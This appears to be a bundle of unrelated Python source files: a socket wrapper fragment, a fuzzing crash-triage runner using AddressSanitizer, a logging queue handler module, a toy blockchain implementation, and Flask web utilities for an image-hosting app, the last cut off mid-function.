self.socket.connect((host, port))
self.stdin = self.socket.makefile('wb')
self.stdout = self.socket.makefile('rb')
def write(self, message: bytes) -> None:
self.stdin.write(message)
self.stdin.flush()
def readline(self) -> bytes:
if l := self.stdout.readline():
return l
raise EOFError
def read(self, n: int) -> bytes:
if l := self.stdout.read(n):
return l
raise EOFError
def dispose(self) -> None:
try:
self.socket.close()
except:
core.log_exception()
|
crashrunner.py
|
#!/usr/bin/python3
"""
Assume that we have conducted experiments with 30 repetitions and the folder is like:
/c/work/general/afl/exiv2/1/crashes
/c/work/general/afl/exiv2/2/crashes
...
/c/work/general/afl/exiv2/30/crashes
We can run the crash to obtain ASAN output to folder /c/ASAN_OUTPUT/c_work_general/{fuzzername}/{progname}/{repetition}/
# cd /c/work/general/afl
# find -type f|grep crashes/|grep -v README.txt > crasheslist.txt
# cat crasheslist.txt|CMD="/d/p/aflasan/exiv2 @@" /nfs/scripts/crashrunner.py
"""
import sys
import subprocess
import re
import os
import time
import glob
import shlex
import shutil
import threading
from time import sleep
MAX_THREADS = 10
os.environ["ASAN_OPTIONS"]='stack_trace_format="FUNCTIONSTARTFUNCTIONSTARTFUNCTIONSTART%fFUNCTIONENDFUNCTIONENDFUNCTIONEND_LOCATIONSTARTLOCATIONSTARTLOCATIONSTART%SLOCATIONENDLOCATIONENDLOCATIONEND_FRAMESTARTFRAMESTARTFRAMESTART%nFRAMEENDFRAMEENDFRAMEEND"'
def dprint(*args):
sys.stderr.write(" ".join([str(i) for i in args])+"\n")
def run_one_file(file, cmd, tmpfile, stdoutfile, stderrfile, timeoutfile, timeout=10):
"""
Run certain file to get stdoutfile and stderrfile
First, the file will be copied to tmpfile,
then @@ in cmd will be replaced to tmpfile,
output will be saved to stdoutfile and stderrfile
if timedout, timeoutfile will be created
Return: (nottimeout, runtime, outputtext)
The caller should keep tmpfile only operated by current thread,
stdoutfile folder should be present
"""
shutil.copy(file, tmpfile)
if "@@" in cmd:
cmds = shlex.split(cmd.replace("@@", tmpfile))
stdin = None
else:
cmds = shlex.split(cmd)
stdin = open(tmpfile, "rb")
nottimeout = True
if os.path.exists(timeoutfile):
os.unlink(timeoutfile)
starttime = time.time()
#dprint(cmds)
try:
x = subprocess.run(cmds, stdin=stdin, stdout=subprocess.PIPE, stderr=subprocess.PIPE, timeout=10)
exitcode = x.returncode
except subprocess.TimeoutExpired as e:
x = e
nottimeout = False
with open(timeoutfile, "w") as tmp:
tmp.write(file+"\n")
exitcode = -15 #SIGTERM
endtime = time.time()
runtime = endtime - starttime
outputtext = x.stdout.decode(errors="ignore")+"\n"+x.stderr.decode(errors="ignore")
with open(stdoutfile, "wb") as fp:
fp.write(x.stdout)
with open(stderrfile, "wb") as fp:
fp.write(x.stderr)
with open(stdoutfile.replace(".stdout", ".returncode"), "w") as fp:
fp.write(str(exitcode))
return (nottimeout, exitcode, runtime, outputtext)
FINISHED = 0
RESULT = {}
from db_crash_init_new import parse_asan
def getbugid(text, progname):
gccasan_vulntype,gccasan_full,gccasan_fullraw,gccasan_uniq,gccasan_1,gccasan_2,gccasan_3,gccasan_4,gccasan_5, bugid = parse_asan(text, progname)
return bugid
def thread_main(files, cmd, threadid, myname):
# in each thread, iteratively call run_one_file:
# run_one_file(file, cmd, tmpfile, stdoutfile, stderrfile, timeoutfile, timeout=10)
# tmpfile is calculated using myname and threadid
# pathname of other output files are generated using file pathname,
# appending ".stdout", ".stderr", ".timeout" suffix respectively
global FINISHED, RESULT
usecache = not os.environ.get("NOCACHE", False)
pwd = os.getcwd()
for file in files:
# we will place output files to a folder under /c/ASAN_OUTPUT/
# this folder is generated solely from file pathname
# used as a cache folder, to speed up further analysis
# we ignore certain keywords to shorten output_folder name
#print(file)
f = file.split("/")
fname = f[-1]
blacklist = ["", ".", "output", "d", "crashes", "data1", "data2", "data3"]
if file.startswith(pwd):
# absolute path
prefix = "_".join([i for i in f[:-1] if i not in blacklist])
else:
# relative path
prefix = "_".join([i for i in pwd.split("/") if i not in blacklist]) + "/" + "/".join([i for i in f[:-1] if i not in blacklist])
#print(prefix)
output_folder = "/c/ASAN_OUTPUT/"+prefix+"/"
if not os.path.exists(output_folder):
os.makedirs(output_folder, exist_ok=True)
tmpfile = "/tmp/{myname}_{threadid}".format(**locals())
stdoutfile = output_folder+fname+".stdout"
stderrfile = output_folder+fname+".stderr"
timeoutfile = output_folder+fname+".timeout"
# res: (nottimeout, exitcode, runtime, outputtext)
if not os.path.exists(stdoutfile) or not usecache:
# do not read cache, run it!
res = run_one_file(file, cmd, tmpfile, stdoutfile, stderrfile, timeoutfile, timeout=10)
else:
nottimeout = not os.path.exists(timeoutfile)
exitcode = int(open(stdoutfile.replace(".stdout", ".returncode")).read())
runtime = -1
outputtext = open(stdoutfile, "r", errors="ignore").read()+"\n"+open(stderrfile, "r", errors="ignore").read()
res = (nottimeout, exitcode, runtime, outputtext)
RESULT[file] = res
if "AddressSanitizer" in res[3]:
print(file)
FINISHED += 1
if __name__ == "__main__":
FILES = [i for i in sys.stdin.read().split("\n") if i and os.path.isfile(i)]
if not FILES:
print("[Error] empty crash files? please check glob syntax!")
exit(1)
len_FILES = len(FILES)
dprint("Total files:", len_FILES)
cmd = os.environ.get("CMD", None)
if not cmd:
print("[Error] env CMD not given")
exit(1)
progpath = shlex.split(cmd)[0]
progname = progpath.split("/")[-1]
assert progname in ["base64", "exiv2", "ffmpeg", "flvmeta", "infotocap", "mp3gain", "mp42aac", "objdump", "pdftotext", "tcpdump", "tiffsplit", "uniq", "wav2swf", "who", "cflow", "gdk-pixbuf-pixdata", "imginfo", "jhead", "jq", "lame3.99.5", "mujs", "nm-new", "sqlite3"]
assert os.access(progpath, os.X_OK), "CMD program not executable?"
myname = "tmp_crashrunner_"+str(os.getpid())
threadN = min(MAX_THREADS, len_FILES)
for i in range(threadN):
t = threading.Thread(target=thread_main, args=[FILES[i::threadN], cmd, i, myname])
t.start()
while FINISHED < len_FILES:
#print("finished:", FINISHED, "/", len_FILES)
sleep(1)
foundbugids = set()
for name, value in RESULT.items():
text = value[3]
if "AddressSanitizer" in text:
foundbugids.add(getbugid(text, progname))
print("bugids:", sorted(list(foundbugids)))
for f in glob.glob("/tmp/"+myname+"*"):
os.unlink(f)
|
queue_channel.py
|
# Copyright (c) 2008-2013 by Vinay Sajip.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * The name(s) of the copyright holder(s) may not be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER(S) "AS IS" AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL THE COPYRIGHT HOLDER(S) BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
This module contains classes which help you work with queues. A typical
application is when you want to log from performance-critical threads, but
where the handlers you want to use are slow (for example,
:class:`~logging.handlers.SMTPHandler`). In that case, you can create a queue,
pass it to a :class:`QueueHandler` instance and use that instance with your
loggers. Elsewhere, you can instantiate a :class:`QueueListener` with the same
queue and some slow handlers, and call :meth:`~QueueListener.start` on it.
This will start monitoring the queue on a separate thread and call all the
configured handlers *on that thread*, so that your logging thread is not held
up by the slow handlers.
Note that as well as in-process queues, you can use these classes with queues
from the :mod:`multiprocessing` module.
**N.B.** This is part of the standard library since Python 3.2, so the
version here is for use with earlier Python versions.
"""
import logging
try:
import Queue as queue
except ImportError:
import queue
import threading
class QueueHandler(logging.Handler):
"""
This handler sends events to a queue. Typically, it would be used together
with a multiprocessing Queue to centralise logging to file in one process
(in a multi-process application), so as to avoid file write contention
between processes.
:param queue: The queue to send `LogRecords` to.
"""
def __init__(self, queue):
"""
Initialise an instance, using the passed queue.
"""
logging.Handler.__init__(self)
self.queue = queue
def enqueue(self, record):
"""
Enqueue a record.
The base implementation uses :meth:`~queue.Queue.put_nowait`. You may
want to override this method if you want to use blocking, timeouts or
custom queue implementations.
:param record: The record to enqueue.
"""
self.queue.put_nowait(record)
def prepare(self, record):
"""
Prepares a record for queuing. The object returned by this method is
enqueued.
The base implementation formats the record to merge the message
and arguments, and removes unpickleable items from the record
in-place.
You might want to override this method if you want to convert
the record to a dict or JSON string, or send a modified copy
of the record while leaving the original intact.
:param record: The record to prepare.
"""
# The format operation gets traceback text into record.exc_text
# (if there's exception data), and also puts the message into
# record.message. We can then use this to replace the original
# msg + args, as these might be unpickleable. We also zap the
# exc_info attribute, as it's no longer needed and, if not None,
# will typically not be pickleable.
self.format(record)
record.msg = record.message
record.args = None
record.exc_info = None
return record
def emit(self, record):
"""
Emit a record.
Writes the LogRecord to the queue, preparing it for pickling first.
:param record: The record to emit.
"""
try:
self.enqueue(self.prepare(record))
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
class QueueListener(object):
"""
This class implements an internal threaded listener which watches for
LogRecords being added to a queue, removes them and passes them to a
list of handlers for processing.
:param record: The queue to listen to.
:param handlers: The handlers to invoke on everything received from
the queue.
"""
_sentinel = None
def __init__(self, queue, *handlers):
"""
Initialise an instance with the specified queue and
handlers.
"""
self.queue = queue
self.handlers = handlers
self._stop = threading.Event()
self._thread = None
def dequeue(self, block):
"""
Dequeue a record and return it, optionally blocking.
The base implementation uses :meth:`~queue.Queue.get`. You may want to
override this method if you want to use timeouts or work with custom
queue implementations.
:param block: Whether to block if the queue is empty. If `False` and
the queue is empty, an :class:`~queue.Empty` exception
will be thrown.
"""
return self.queue.get(block)
def start(self):
"""
Start the listener.
This starts up a background thread to monitor the queue for
LogRecords to process.
"""
self._thread = t = threading.Thread(target=self._monitor)
t.setDaemon(True)
t.start()
def prepare(self , record):
"""
Prepare a record for handling.
This method just returns the passed-in record. You may want to
override this method if you need to do any custom marshalling or
manipulation of the record before passing it to the handlers.
:param record: The record to prepare.
"""
return record
def handle(self, record):
"""
Handle a record.
This just loops through the handlers offering them the record
to handle.
:param record: The record to handle.
"""
record = self.prepare(record)
for handler in self.handlers:
handler.handle(record)
def _monitor(self):
"""
Monitor the queue for records, and ask the handler
to deal with them.
This method runs on a separate, internal thread.
The thread will terminate if it sees a sentinel object in the queue.
"""
q = self.queue
has_task_done = hasattr(q, 'task_done')
while not self._stop.isSet():
try:
record = self.dequeue(True)
if record is self._sentinel:
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
pass
# There might still be records in the queue.
while True:
try:
record = self.dequeue(False)
if record is self._sentinel:
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
break
def enqueue_sentinel(self):
"""
Writes a sentinel to the queue to tell the listener to quit. This
implementation uses ``put_nowait()``. You may want to override this
method if you want to use timeouts or work with custom queue
implementations.
"""
self.queue.put_nowait(self._sentinel)
def stop(self):
"""
Stop the listener.
This asks the thread to terminate, and then waits for it to do so.
Note that if you don't call this before your application exits, there
may be some records still left on the queue, which won't be processed.
"""
self._stop.set()
self.enqueue_sentinel()
self._thread.join()
self._thread = None
class MutableQueueListener(QueueListener):
def __init__(self, queue, *handlers):
super(MutableQueueListener, self).__init__(queue, *handlers)
"""
Initialise an instance with the specified queue and
handlers.
"""
# Changing this to a list from tuple in the parent class
self.handlers = list(handlers)
def addHandler(self, handler):
if handler not in self.handlers:
self.handlers.append(handler)
def removeHandler(self, handler):
if handler in self.handlers:
self.handlers.remove(handler)
|
blockchain.py
|
# Specter BlockChain Implementation
# Nick Frichette 12/9/2017
import json
import hashlib
import requests
import base64
from threading import Thread
from database_orm import *
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.exceptions import InvalidSignature
# ANSI escape sequences
FAIL = '\033[91m'
END = '\033[0m'
OK = '\033[92m'
class Blockchain:
NODE_ADDRESS_LIST = ['http://localhost:5000']
blocks = []
index = 0
db = None
transaction_pool = []
def __init__(self, is_node=False):
# Instantiate DB
self.db = Database()
if is_node:
print OK + 'Thank you for standing up a node!' + END
# If the DB is empty, generate the Genesis
if self.db.is_empty():
print FAIL + 'No blocks in chain' + END
print OK + 'Creating Genesis Block' + END
genesis = self.make_genesis_block()
self.add_block(genesis)
else:
# For each row in the DB, create a block
blocks = self.db.get_all_blocks()
for item in blocks:
block = Block(
item.coin_index,
json.loads(item.transaction_info),
item.previous_hash,
item.current_hash,
item.timestamp,
item.nonce
)
self.add_block(block)
# Unverified transactions are added to the transaction pool
# A separate thread will put them onto the block chain.
# This should be more preformat at scale.
#trans_thread = Thread(target=self.transaction_thread)
#trans_thread.daemon = true
#trans_thread.start()
else:
# This is an implementation meant for normal users
try:
blockchain_json = self.download_blockchain()
self.unjsonify(blockchain_json)
except requests.exceptions.ConnectionError:
print FAIL + "Failed to connect to nodes. Terminating" + END
exit()
def download_blockchain(self):
# Query the nodes for the blockchain
# In the future validation will need to occur
blockchain_json = []
for address in self.NODE_ADDRESS_LIST:
request = requests.get(address + '/getblockchain')
blockchain_json = request.json()
return blockchain_json
def update_blockchain(self):
try:
blockchain_json = self.download_blockchain()
self.blocks = []
self.unjsonify(blockchain_json)
except requests.exceptions.ConnectionError:
print "Failed to update blockchain"
def jsonify(self):
data_json = {}
i = 0
for block in self.blocks:
data = {
"index": block.coin_index,
"transaction": block.transaction_info,
"previous_hash": block.previous_hash,
"current_hash": block.current_hash,
"timestamp": block.timestamp,
"nonce": block.nonce
}
data_json[i] = data
i += 1
return data_json
def unjsonify(self, json_data):
for block in json_data:
js = json_data[block]
block = Block(
js['index'],
js['transaction'],
js['previous_hash'],
js['current_hash'],
js['timestamp'],
js['nonce']
)
self.blocks.append(block)
# If not in the DB, insert it
#if not self.db.in_db(block):
# self.db.insert_block(block)
return None
def print_chain(self):
print self.blocks
return self.blocks
def add_block(self, block):
if not self.db.in_db(block):
self.db.insert_block(block)
self.blocks.append(block)
def make_block(self, transaction):
self.index += 1
# Error handling to fix serialization issues
transaction['amount'] = int(transaction['amount'])
block_hash = self.calc_block_hash(self.index, transaction['hash'], transaction['timestamp'], transaction, 0)
block = Block(self.index, transaction, transaction['hash'], block_hash, transaction['timestamp'], 0)
self.add_block(block)
def make_genesis_block(self):
print OK + 'Genesis Block Created' + END
transaction = {
"from": "-1",
"to": "MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAupSwIG17vricebp6EN88"+
"7wzHj0OsaxYl24z2VT6U9+ByEoGGWOPC/Nv9jwebzCLT49Bv5nZL0c7WCQMvvb5o"+
"3BNk2wPZR6XEQBZxgwXJdt5h2Ye+Nyc8wYvZodp1ouUv2jCNvcnH4VCz6y56yPzc"+
"861ZeYGGO9xbTu7RLkBqGODIqNqLzRhIdpYDukz2TVgHrEXalu+SFkrHo+oc5OBg"+
"YYLQeOSlzRKxgfvFG9ViNlqHP0tQDQsGnakBFuBWW5DuwrEKjqkmM+dxo9ALNaag"+
"ELpB60zXK2ZxwdvOmko8KZNsHVQMzZql2hcJiyfc99OvOBgp/xTscK94NNqQ6m2M"+
"pFr8V07XFnRB8r1EQhY9oFuraUi9xSZbKc3DVG3FEfSyo2Q/+jT+9dkSt7GegIya"+
"wM3saOY2VeN1f8XsfQ+a96SL+ltas99NlDJGMuOJOjrKherpfEBcuEK5EvljceGy"+
"b7O4NyUcQ/k0q/ngQM+Lz5/3RUShqCbtkmjH5FAxiNHzluy83hJyxGxrYHTEMF88"+
"Z6YHyaOBUpMp3mvPMVqM/jeI2aslJDTEDmeaRhs6yI90RDyohzb1FUctUKVPiL8a"+
"FI9/gKmSCpgB8BEpI23K0az4kbItnWLe3xzABSFL0nSQWkXQqWmepKcDwp6TcJtG"+
"/U5BSE284qlQFOd50rW0xRUCAwEAAQ==",
"amount": 100,
"signature": "-1",
"timestamp": -1,
"hash": -1
}
current_hash = self.calc_block_hash(0, -1, -1, transaction, 0)
genesis_block = Block(0, transaction, -1, current_hash, 0, 0)
self.index += 1
return genesis_block
def calc_block_hash(self, index, prev_hash, timestamp, transaction, nonce=0):
data = {
"index": index,
"previous_hash": prev_hash,
"timestamp": timestamp,
"transaction": transaction,
"nonce": nonce
}
data_json = json.dumps(data, sort_keys=True)
hashed = hashlib.sha256(data_json)
return hashed.hexdigest()
def lookup_address(self, address):
# Begin searching for transactions from that address
balance = 0
for block in self.blocks:
if block.transaction_info['from'] == address:
balance -= block.transaction_info['amount']
if block.transaction_info['to'] == address:
balance += block.transaction_info['amount']
return balance
def validate_transaction(self, transaction):
# We need to ensure that a transaction is valid on the blockchain
# First lets get the amount the user wants to move
amount = int(transaction['amount'])
# Now let's check their balance with their public key
balance = self.lookup_address(transaction['from'])
# Now compare the two
if amount < balance:
return True
else:
return False
@staticmethod
def create_signable_transaction(from_address, to_address, amount, timestamp):
return ':'.join((from_address, to_address, amount, str(timestamp)))
def authenticate_transaction(self, transaction):
is_verified = self.verify_remote_transaction(transaction['from'], transaction['signature'], transaction)
return is_verified
def verify_remote_transaction(self, public_key, signature, transaction):
# transaction.pop('hash')
transaction = self.create_signable_transaction(
transaction['from'],
transaction['to'],
transaction['amount'],
transaction['timestamp']
)
key = "-----BEGIN PUBLIC KEY-----\n"
i = 0
while i < len(public_key):
key += public_key[i:i+64]+'\n'
i += 64
key += "-----END PUBLIC KEY-----\n"
public_key = serialization.load_pem_public_key(
str(key),
backend=default_backend()
)
try:
public_key.verify(
bytes(base64.decodestring(signature)),
bytes(transaction),
padding.PSS(
mgf=padding.MGF1(hashes.SHA256()),
salt_length=padding.PSS.MAX_LENGTH
),
hashes.SHA256()
)
return True
except InvalidSignature:
return False
#def transaction_thread(self):
# while true:
# while len(self.transaction_pool) > 0:
# transaction = self.transaction_pool[-1]
# if self.authenticate_transaction(transaction):
# if self.validate_transaction(transaction):
# print str(len(self.blocks))
# print OK + "Confirmed Transaction" + END
# self.make_block(self.transaction_pool.pop())
# print str(len(self.blocks))
def add_transaction_to_pool(self, transaction):
#self.transaction_pool.append(transaction)
if self.authenticate_transaction(transaction):
if self.validate_transaction(transaction):
self.make_block(transaction)
if __name__ == '__main__':
blockchain = Blockchain()
|
web.py
|
# -*- coding: utf-8 -*-
"""
utils.web
~~~~~~~~~
Some web app tool classes and functions.
:copyright: (c) 2019 by staugur.
:license: BSD 3-Clause, see LICENSE for more details.
"""
import json
import imghdr
from posixpath import basename, splitext
from os import remove
from os.path import join as pathjoin, getsize
from io import BytesIO
from functools import wraps
from base64 import urlsafe_b64decode as b64decode, b64decode as pic64decode
from binascii import Error as BaseDecodeError
from redis.exceptions import RedisError
from requests.exceptions import RequestException
from flask import (
g,
redirect,
request,
url_for,
abort,
Response,
jsonify,
current_app,
make_response,
Markup,
)
from jinja2 import Environment, FileSystemLoader
from sys import executable
from functools import partial
from subprocess import call, check_output
from itsdangerous import (
TimedJSONWebSignatureSerializer as Serializer,
SignatureExpired,
BadSignature,
)
from tempfile import NamedTemporaryFile
from libs.storage import get_storage
from .tool import (
logger,
get_current_timestamp,
rsp,
sha256,
username_pat,
parse_valid_comma,
parse_data_uri,
format_apires,
url_pat,
ALLOWED_EXTS,
parse_valid_verticaline,
parse_valid_colon,
is_true,
is_venv,
gen_ua,
check_to_addr,
is_all_fail,
bleach_html,
try_request,
comma_pat,
create_redis_engine,
allowed_file,
parse_label,
ALLOWED_VIDEO,
b64size,
)
from ._compat import PY2, text_type, urlsplit, parse_qs
from threading import Thread
if not PY2:
from functools import reduce
rc = create_redis_engine()
no_jump_ep = ("front.login", "front.logout", "front.register")
def get_referrer_url():
"""获取上一页地址"""
if (
request.method == "GET"
and request.referrer
and request.referrer.startswith(request.host_url)
and request.endpoint
and "api." not in request.endpoint
and request.endpoint not in no_jump_ep
):
url = request.referrer
else:
url = None
return url
def get_redirect_url(endpoint="front.index"):
"""获取重定向地址"""
url = request.args.get("next")
if not url:
if endpoint != "front.index":
url = url_for(endpoint)
else:
url = (
get_referrer_url()
or (request.full_path if request.endpoint not in no_jump_ep else None)
or url_for(endpoint)
)
return url
def default_login_auth(dSid=None):
"""默认登录解密
:returns: (signin:boolean, userinfo:dict)
"""
sid = request.cookies.get("dSid") or dSid or ""
signin = False
userinfo = {}
try:
if not sid:
raise ValueError
if PY2 and isinstance(sid, text_type):
sid = sid.encode("utf-8")
sid = b64decode(sid)
if not PY2 and not isinstance(sid, text_type):
sid = sid.decode("utf-8")
usr, expire, sha = sid.split(".")
expire = int(expire)
except (TypeError, ValueError, AttributeError, Exception):
pass
else:
if expire > get_current_timestamp():
ak = rsp("accounts")
pipe = g.rc.pipeline()
pipe.sismember(ak, usr)
pipe.hgetall(rsp("account", usr))
try:
result = pipe.execute()
except RedisError:
pass
else:
if isinstance(result, (tuple, list)) and len(result) == 2:
has_usr, userinfo = result
if has_usr and userinfo and isinstance(userinfo, dict):
pwd = userinfo.pop("password", None)
if (
sha256(
"%s:%s:%s:%s"
% (usr, pwd, expire, current_app.config["SECRET_KEY"])
)
== sha
):
signin = True
if not signin:
userinfo = {}
return (signin, userinfo)
def login_required(f):
"""页面要求登录装饰器"""
@wraps(f)
def decorated_function(*args, **kwargs):
if not g.signin:
nu = get_redirect_url()
if nu and (nu.startswith("/") or nu.startswith(request.url_root)):
return redirect(url_for("front.login", next=nu))
else:
return redirect(url_for("front.login"))
return f(*args, **kwargs)
return decorated_function
def anonymous_required(f):
"""页面要求匿名装饰器"""
@wraps(f)
def decorated_function(*args, **kwargs):
if g.signin:
return redirect(url_for("front.index"))
return f(*args, **kwargs)
return decorated_function
def apilogin_required(f):
"""接口要求登录装饰器"""
@wraps(f)
def decorated_function(*args, **kwargs):
if not g.signin:
return abort(403)
if g.signin and g.userinfo.status == 0:
return abort(
make_response(
jsonify(msg="The user is disabled, no operation", code=403), 403
)
)
return f(*args, **kwargs)
return decorated_function
def admin_apilogin_required(f):
"""接口要求管理员级别登录装饰器"""
@wraps(f)
def decorated_function(*args, **kwargs):
if g.signin:
if g.is_admin and g.userinfo.status == 1:
return f(*args, **kwargs)
else:
return abort(403)
else:
return abort(404)
return decorated_function
def parse_accept_language(acceptLanguage, default_language="zh-CN"):
if not acceptLanguage:
return default_language
languages = acceptLanguage.split(",")
locale_q_pairs = []
for language in languages:
if language.split(";")[0] == language:
# no q => q = 1
locale_q_pairs.append((language.strip(), "1"))
else:
locale = language.split(";")[0].strip()
q = language.split(";")[1].split("=")[1]
locale_q_pairs.append((locale, q))
return (
sorted(locale_q_pairs, key=lambda x: x[-1], reverse=True)[0][0]
or default_language
)
def dfr(res, default="en-US"):
"""定义前端返回,将res中msg字段转换语言
:param dict res: 例如 {"msg": "翻译内容(英文)", "other": "xx"}
:param str default: 默认语言
"""
try:
language = parse_accept_language(
request.cookies.get(
"locale", request.headers.get("Accept-Language", default)
),
default,
)
if language == "zh-Hans-CN":
language = "zh-CN"
except (ValueError, TypeError, KeyError, Exception):
language = default
# 翻译转换字典库 TODO 翻译文本文件,按英文索引
trans = {
# 简体中文
"zh-CN": {
"Hello World": "你好,世界",
"Parameter error": "参数错误",
"The upload_path type error": "upload_path类型错误",
"The upyun parameter error": "又拍云相关参数错误",
"Please install upyun module": "请安装upyun模块",
"Please install qiniu module": "请安装qiniu模块",
"The qiniu parameter error": "七牛云相关参数错误",
"The aliyun parameter error": "阿里云oss相关参数错误",
"The tencent parameter error": "腾讯云cos相关参数错误",
"The sm.ms parameter error": "sm.ms相关参数错误",
"The github parameter error": "GitHub相关参数错误",
"The gitee parameter error": "Gitee相关参数错误",
"An unknown error occurred in the program": "程序发生未知错误",
"Program data storage service error": "程序数据存储服务异常",
"Anonymous user is not sign in": "匿名用户未登录",
"No valid username found": "未发现有效用户名",
"The username or password parameter error": "用户名或密码参数错误",
"No data": "没有数据",
"No file or image format error": "未获取到文件或不允许的图片格式",
"All backend storage services failed to save pictures": "后端存储服务图片保存全部失败",
"No valid backend storage service": "无有效后端存储服务",
"No valid backend hook": "无有效后端钩子",
"The third module not found": "第三方模块未发现",
"Password verification failed": "密码验证失败",
"Password must be at least 6 characters": "密码最少6位",
"Confirm passwords do not match": "确认密码不匹配",
"Existing token": "已有token",
"No token yet": "还未有token",
"The username is invalid or registration is not allowed": "用户名不合法或不允许注册",
"The username already exists": "用户名已存在",
"Normal user login has been disabled": "已禁止普通用户登录",
"Illegal users are not allowed to modify": "不合法的用户禁止修改",
"The user setting must start with `ucfg_`": "用户设置必须以`ucfg_`开头",
"Invalid IP address": "无效的IP地址",
"Invalid url address": "无效的url",
"Not found the LinkId": "没有此LinkId",
"Not found the endpoint": "无此endpoint路由端点",
"Invalid HTTP method": "无效http方法",
"Invalid exterior_relation": "无效的exterior_relation平行规则",
"Invalid interior_relation": "无效的interior_relation内联规则",
"Wrong query range parameter": "查询范围错误",
"accepted": "已接受",
"Pending review, cannot upload pictures": "审核中,不能上传图片",
"The user is disabled, no operation": "用户被禁用,无权操作",
"Email send failed": "邮件发送失败",
"expired token": "token过期",
"useless": "无用token",
"Current state prohibits use of this method": "当前状态禁止使用此方法",
"The user has no authenticated mailbox": "用户没有验证过的邮箱",
"Interceptor processing rejection, upload aborted": "拦截器处理拒绝,上传中止",
"Request fail": "请求失败",
"Invalid expire param": "无效的expire参数",
"Users also have pictures that cannot be deleted": "用户还有图片,不能删除",
"The upload hook does not exist or is disabled": "上传钩子不存在或被禁用",
"User uploads are limited": "用户上传数量限制",
"the uploaded file exceeds the limit": "上传文件超出限制",
},
}
if isinstance(res, dict) and "en" not in language:
if res.get("msg"):
msg = res["msg"]
try:
new = trans[language][msg]
except KeyError:
logger.debug("Miss translation: %s" % msg)
else:
res["msg"] = new
return res
def change_res_format(res):
if isinstance(res, dict) and "code" in res:
sn = request.form.get("status_name", request.args.get("status_name")) or "code"
oc = request.form.get("ok_code", request.args.get("ok_code"))
mn = request.form.get("msg_name", request.args.get("msg_name"))
return format_apires(res, sn, oc, mn)
return res
def change_userinfo(userinfo):
"""解析用户信息userinfo部分字段数据"""
if userinfo and isinstance(userinfo, dict):
userinfo.update(
parsed_ucfg_url_rule=parse_valid_colon(userinfo.get("ucfg_url_rule")) or {},
parsed_ucfg_url_rule_switch=dict(
loadmypic=is_true(g.userinfo.get("ucfg_urlrule_inloadmypic")),
url=is_true(g.userinfo.get("ucfg_urlrule_incopyurl")),
html=is_true(g.userinfo.get("ucfg_urlrule_incopyhtml")),
rst=is_true(g.userinfo.get("ucfg_urlrule_incopyrst")),
markdown=is_true(g.userinfo.get("ucfg_urlrule_incopymd")),
),
#: ..versionadded:: 1.7.0
#: 用户状态默认是1启用,-2、-1待审核仅无法上传,0禁用无任何权限
status=int(userinfo.get("status", 1)),
#: .. versionadded:: 1.12.0
#: 转换标签
label=parse_label(userinfo.get("label")),
)
return userinfo
def get_site_config():
"""获取站点配置"""
s = get_storage()
cfg = s.get("siteconfig") or {}
return cfg
def set_site_config(mapping):
"""设置站点信息"""
if mapping and isinstance(mapping, dict):
ALLOWED_TAGS = ["a", "abbr", "b", "i", "code", "p", "br", "h3", "h4"]
ALLOWED_ATTRIBUTES = {
"a": ["href", "title", "target"],
"abbr": ["title"],
"*": ["style"],
}
ALLOWED_STYLES = ["color"]
upload_beforehtml = mapping.get("upload_beforehtml") or ""
bulletin = mapping.get("bulletin") or ""
about = mapping.get("about") or ""
if upload_beforehtml:
mapping["upload_beforehtml"] = bleach_html(
upload_beforehtml, ALLOWED_TAGS, ALLOWED_ATTRIBUTES, ALLOWED_STYLES
)
if bulletin:
ALLOWED_TAGS.append("img")
ALLOWED_ATTRIBUTES["img"] = ["title", "alt", "src", "width", "height"]
mapping["bulletin"] = bleach_html(
bulletin, ALLOWED_TAGS, ALLOWED_ATTRIBUTES, ALLOWED_STYLES
)
if about:
mapping["about"] = bleach_html(
about, ALLOWED_TAGS, ALLOWED_ATTRIBUTES, ALLOWED_STYLES
)
s = get_storage()
cfg = s.get("siteconfig") or {}
cfg.update(mapping)
s.set("siteconfig", cfg)
def check_username(usr):
"""检测用户名是否合法、是否可以注册"""
if usr and username_pat.match(usr):
cfg = get_site_config()
fus = set(parse_valid_comma(cfg.get("forbidden_username") or ""))
fus.add("anonymous")
if usr not in fus:
return True
return False
def guess_filename_from_url(url, allowed_exts=None):
"""从url中猜测图片文件名,其后缀符合控制台设定或默认予以返回。
首先尝试从url path猜测,比如http://example.com/upload/abc.png,这合法。
如果猜测失败,则从url query查找filename查询参数。
:param str url: 图片地址
:param list allowed_exts: 允许的图片后缀,比如['png', 'jpg'],
如未设置,则使用控制台设定或默认
:returns: 当图片合法时返回filename,否则None
.. versionadded:: 1.10.0
"""
_allowed_exts = [".{}".format(e) for e in get_allowed_suffix()]
ufn = basename(urlsplit(url).path)
if splitext(ufn)[-1] in _allowed_exts:
return ufn
else:
fns = parse_qs(urlsplit(url).query).get("filename")
if fns and isinstance(fns, (list, tuple)):
filename = fns[0]
